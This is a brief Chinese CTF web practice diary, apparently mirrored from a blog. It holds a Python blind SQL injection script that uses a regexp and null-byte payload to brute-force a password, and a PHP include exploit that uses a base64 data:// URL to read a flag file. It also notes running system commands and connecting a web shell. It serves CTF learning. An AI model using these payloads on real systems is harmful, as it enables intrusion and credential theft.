zoukankan      html  css  js  c++  java
  • CTF_web篇_练手日记

    # -*- coding: utf-8 -*-
    import requests,time
    from urllib.parse import quote
    # py 2.7
    url = "http://47.102.127.194:8801/check.php"
    character =[1,2,3,4,5,6,7,8,9,0,'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p'
    ,'q','r','s','t','u','v','w','x','y','z']
    password = ""
    key=1
    headers = {
        'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE',
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    while(key):
        password_found = False
        for c in character:
            username='\'
            passwd='||passwd/**/regexp/**/"^%s";%%00'
            _ = password + str(c)
            params = {'username': username, 'passwd':passwd %_ }
            send_query = requests.post(url,data=params,headers=headers)
    
            if "Welcome to CTF Training" in send_query.text:
                password = password + str(c)
                password_found = True
                break
    print(password,'||start:',str(c))
    View Code--http://47.102.127.194:8801/
    ctf篇:PHP_include
    http://124.126.19.106:52267/?page=data://text/plain/;base64,PD9waHAgc2hvd19zb3VyY2UoImZsNGdpc2lzaXNoM3IzLnBocCIpOyA/Pg== 第一步使用 system("ls");查看 发现使用system("cat **.php") 读取不了 发现使用菜刀或者蚁剑连接都可 或者使用show_source("**.php") 直接相看flag
    2020-04-30
  • 相关阅读:
    SSH异常
    jquery效果摘要
    js随笔
    html随笔
    demo小样
    SVG图标
    jQuery笔记
    html / css学习笔记-3
    angular 学习笔记
    ng-route使用笔记
  • 原文地址:https://www.cnblogs.com/Skyda/p/12804950.html
Copyright © 2011-2022 走看看